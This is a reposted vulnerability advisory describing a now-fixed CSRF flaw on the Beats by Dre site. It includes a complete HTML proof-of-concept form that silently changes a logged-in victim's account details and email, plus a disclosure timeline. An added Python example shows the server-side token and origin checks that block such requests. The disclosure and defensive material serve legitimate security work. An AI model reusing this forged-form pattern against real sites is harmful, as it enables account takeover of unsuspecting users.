###########################

# Beats By Dre Cross Site Request Forgery Vulnerability

###########################

Hello,

I am Aaditya Purani, and I had found a CSRF (Cross Site Request Forgery)
on Beats by Dr. Dre which could lead to full account takeover and
information change by just sending a maliciously crafted link to the user.

Proof of Concept:

<html>
<!-- CSRF PoC - By Aaditya Purani -->
<body>
<form method="POST" action="https://www.beatsbydre.com/on/demandware.store/Sites-beats-Site/en_US/GigyaRAAS-SaveCustomer">
<input type="hidden" name="firstName" value="hacked" />
<input type="hidden" name="lastName" value="hackerone" />
<input type="hidden" name="emailAddress" value="victimsemail@gmail.com" />
<input type="hidden" name="zip" value="" />
<input type="hidden" name="phone" value="" />
<!-- the csrf_token below is the attacker's own; the endpoint accepted it for any logged-in user -->
<input type="hidden" name="csrf_token" value="VxM7k0ya2N1R69Ix9E3m/2165n60n2p399n38q6r1904o1po98r1snn323q0q/3Ex5Klu9mD1x5vMo91" />
<input type="hidden" name="isEmailSubscription" value="true" />
<input type="hidden" name="isAlreadySubscribed" value="false" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

Response :

{"isCustomerSavedSuccessfully": true, "unsubscribeStatus": null } -> Attack
Successful

{"isCustomerSavedSuccessfully": false, "unsubscribeStatus": null } ->
Attack Unsuccessful
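The PoC works because the csrf_token value it carries is the attacker's own and is accepted for whoever is logged in, so the token is not bound to the victim's session. Below is an added example, not code from the advisory or from Beats/Demandware, of the server-side check that defeats this class of request: a per-session random token compared in constant time, plus an Origin/Referer check against an assumed trusted origin. The endpoint path, field names and the token string are taken from the PoC above; the session layout and TRUSTED_ORIGINS are assumptions.

```python
import hmac
import secrets
from typing import Dict, Optional, Tuple
from urllib.parse import urlsplit

# Assumed deployment origin (the host the PoC form posts to).
TRUSTED_ORIGINS = {"https://www.beatsbydre.com"}

# Session-altering methods; everything else is treated as read-only.
STATE_CHANGING_METHODS = {"POST", "PUT", "PATCH", "DELETE"}


def issue_csrf_token(session: Dict[str, str]) -> str:
    """Mint a fresh random token and bind it to this user's server-side session."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def request_origin(headers: Dict[str, str]) -> Optional[str]:
    """Return scheme://host from the Origin header, falling back to Referer."""
    for name in ("Origin", "Referer"):
        value = headers.get(name)
        if value:
            parts = urlsplit(value)
            if parts.scheme and parts.netloc:
                return f"{parts.scheme}://{parts.netloc}"
    return None


def is_state_change_allowed(method: str, headers: Dict[str, str],
                            form: Dict[str, str], session: Dict[str, str]) -> Tuple[bool, str]:
    """Decide whether a request may modify the account; returns (allowed, reason)."""
    if method.upper() not in STATE_CHANGING_METHODS:
        return True, "read-only method"

    # 1. The browser must say the form was submitted from our own origin.
    #    A missing Origin/Referer is treated as untrusted (fail closed).
    origin = request_origin(headers)
    if origin not in TRUSTED_ORIGINS:
        return False, f"untrusted origin {origin!r}"

    # 2. The submitted token must equal the token stored in *this* session.
    #    Any fixed or attacker-chosen token, like the one in the PoC, fails here.
    expected = session.get("csrf_token")
    submitted = form.get("csrf_token")
    if not expected or not submitted:
        return False, "missing csrf token"
    if not hmac.compare_digest(expected, submitted):
        return False, "csrf token not bound to this session"

    return True, "ok"


# Constructed sample: the victim's session and the fields from the PoC form.
VICTIM_SESSION: Dict[str, str] = {"user": "victim"}
VICTIM_TOKEN = issue_csrf_token(VICTIM_SESSION)

POC_FORM = {
    "firstName": "hacked",
    "lastName": "hackerone",
    "emailAddress": "victimsemail@gmail.com",
    "zip": "",
    "phone": "",
    "csrf_token": "VxM7k0ya2N1R69Ix9E3m/2165n60n2p399n38q6r1904o1po98r1snn323q0q/3Ex5Klu9mD1x5vMo91",
    "isEmailSubscription": "true",
    "isAlreadySubscribed": "false",
}


def check_poc_request() -> Tuple[bool, str]:
    """The PoC as the browser would send it: cross-site Origin, attacker's token."""
    headers = {"Origin": "https://attacker.example"}  # constructed attacker page
    return is_state_change_allowed("POST", headers, POC_FORM, VICTIM_SESSION)


def check_legitimate_request() -> Tuple[bool, str]:
    """The same fields submitted from the real site with the session's own token."""
    headers = {"Origin": "https://www.beatsbydre.com"}
    form = dict(POC_FORM, csrf_token=VICTIM_TOKEN)
    return is_state_change_allowed("POST", headers, form, VICTIM_SESSION)


if __name__ == "__main__":
    print("PoC request:       ", check_poc_request())
    print("legitimate request:", check_legitimate_request())
```

The origin check alone would already reject the PoC, and the session-bound token alone would too; keeping both means a bug in one (for example a proxy that strips Referer, or a token leaked through a log) does not reopen the hole. Marking the session cookie SameSite=Lax or Strict is a third, independent layer against the same attack.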


Clicking on this link would change the details of any user. I have written a
complete blog post here:
https://aadityapurani.com/2016/07/20/how-i-hacked-your-beats-account-apple-bug-bounty/

Video PoC: https://youtu.be/2SfmmWxiDck

Apple has Acknowledged me in their Hall of fame:
https://support.apple.com/en-us/HT201536

*Timeline:*

October 8th 2015 - Reported
October 23rd 2015 - Triaged
November 6th 2015 - Responded that "Matter is being investigated"
January 18th 2016 - Fixed
June 20th 2016 - Acknowledged

###########################

# Iranian Exploit DataBase = http://IeDb.Ir [2016-08-03]

###########################